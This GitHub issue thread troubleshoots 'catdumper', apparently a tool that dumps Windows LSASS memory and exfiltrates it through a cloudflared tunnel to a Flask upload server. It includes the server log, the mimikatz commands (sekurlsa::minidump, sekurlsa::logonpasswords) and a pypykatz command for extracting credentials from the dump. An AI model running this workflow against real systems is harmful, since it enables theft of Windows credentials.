### ISSUE TITLE
mimikatz doesn't load it

### ISSUE THREAD

**Issue by useragent23253** [Meowmycks/catdumper#2]
I'm used cloudflared tunnel to transfer lsass and it seems good
python3 exfil.py 
 * Serving Flask app 'exfil'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:443
Press CTRL+C to quit
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 138-567-643
127.0.0.1 - - [10/Jan/2024 13:26:22] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:26:39] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:26:49] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:27:07] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:27:21] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:27:36] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:27:49] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:28:09] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:28:24] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:28:43] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:28:58] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:29:09] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:29:27] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:29:49] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:30:04] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:30:16] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:30:30] "POST /upload HTTP/1.1" 200 -
127.0.0.1 - - [10/Jan/2024 13:30:41] "POST /upload HTTP/1.1" 200 -
Data processed and saved to lsass.dmp
127.0.0.1 - - [10/Jan/2024 13:31:33] "POST /upload HTTP/1.1" 200 -

After I was trying to load it into mimikatz and it's just crashing with error. The tested Windows was without any protected features to lsass. Any suggestions please?

**Comment by Meowmycks** [comment]
How exactly are you using mimikatz? What's the error?

**Comment by useragent23253** [comment]
sekurlsa::minidump \path\to\lsass.dmp
Using 'c:\programdata\mimikatz.txt' for logfile : OK

mimikatz # sekurlsa::logonpasswords
Opening : 'C:\Users\Administrator\Downloads\lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Memory opening

As I said that was the default Windows without any LSA(lsass) protection.

**Comment by Meowmycks** [comment]
I've run into that issue before and I haven't been able to consistently replicate it, so it's difficult to find exactly what/how to troubleshoot it. As far as I can tell, it's typically permission issues with Mimikatz itself.

Try using pypykatz instead. Lets you keep the dump on your Linux machine and makes other things more convenient. Install it with apt and run this: `pypykatz lsa minidump lsass.dmp`.

**Comment by useragent23253** [comment]
Something still bad 

`pypykatz lsa minidump lsass.dmp 
INFO:pypykatz:Parsing file lsass.dmp
ERROR:pypykatz:Minidump parsing error!
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/pypykatz/pypykatz.py", line 139, in parse_minidump_file
    minidump = MinidumpFile.parse(filename)
  File "/usr/local/lib/python3.10/dist-packages/minidump/minidumpfile.py", line 49, in parse
    mf._parse()
  File "/usr/local/lib/python3.10/dist-packages/minidump/minidumpfile.py", line 79, in _parse
    self.__parse_header()
  File "/usr/local/lib/python3.10/dist-packages/minidump/minidumpfile.py", line 83, in __parse_header
    self.header = MinidumpHeader.parse(self.file_handle)
  File "/usr/local/lib/python3.10/dist-packages/minidump/header.py", line 34, in parse
    mh.Signature = buff.read(4).decode()[::-1]
UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 0-1: invalid continuation byte
ERROR:pypykatz:Error while parsing file lsass.dmp
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/pypykatz/lsadecryptor/cmdhelper.py", line 266, in run
    mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
  File "/usr/local/lib/python3.10/dist-packages/pypykatz/pypykatz.py", line 144, in parse_minidump_file
    raise e
  File "/usr/local/lib/python3.10/dist-packages/pypykatz/pypykatz.py", line 139, in parse_minidump_file
    minidump = MinidumpFile.parse(filename)
  File "/usr/local/lib/python3.10/dist-packages/minidump/minidumpfile.py", line 49, in parse
    mf._parse()
  File "/usr/local/lib/python3.10/dist-packages/minidump/minidumpfile.py", line 79, in _parse
    self.__parse_header()
  File "/usr/local/lib/python3.10/dist-packages/minidump/minidumpfile.py", line 83, in __parse_header
    self.header = MinidumpHeader.parse(self.file_handle)
  File "/usr/local/lib/python3.10/dist-packages/minidump/header.py", line 34, in parse
    mh.Signature = buff.read(4).decode()[::-1]
UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 0-1: invalid continuation byte
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/pypykatz/lsadecryptor/cmdhelper.py", line 266, in run
    mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
  File "/usr/local/lib/python3.10/dist-packages/pypykatz/pypykatz.py", line 144, in parse_minidump_file
    raise e
  File "/usr/local/lib/python3.10/dist-packages/pypykatz/pypykatz.py", line 139, in parse_minidump_file
    minidump = MinidumpFile.parse(filename)
  File "/usr/local/lib/python3.10/dist-packages/minidump/minidumpfile.py", line 49, in parse
    mf._parse()
  File "/usr/local/lib/python3.10/dist-packages/minidump/minidumpfile.py", line 79, in _parse
    self.__parse_header()
  File "/usr/local/lib/python3.10/dist-packages/minidump/minidumpfile.py", line 83, in __parse_header
    self.header = MinidumpHeader.parse(self.file_handle)
  File "/usr/local/lib/python3.10/dist-packages/minidump/header.py", line 34, in parse
    mh.Signature = buff.read(4).decode()[::-1]
UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 0-1: invalid continuation byte`

**Comment by Meowmycks** [comment]
This is another error I can't consistently replicate. Best I can say is run the executable when you've made sure you have a stable internet connection.
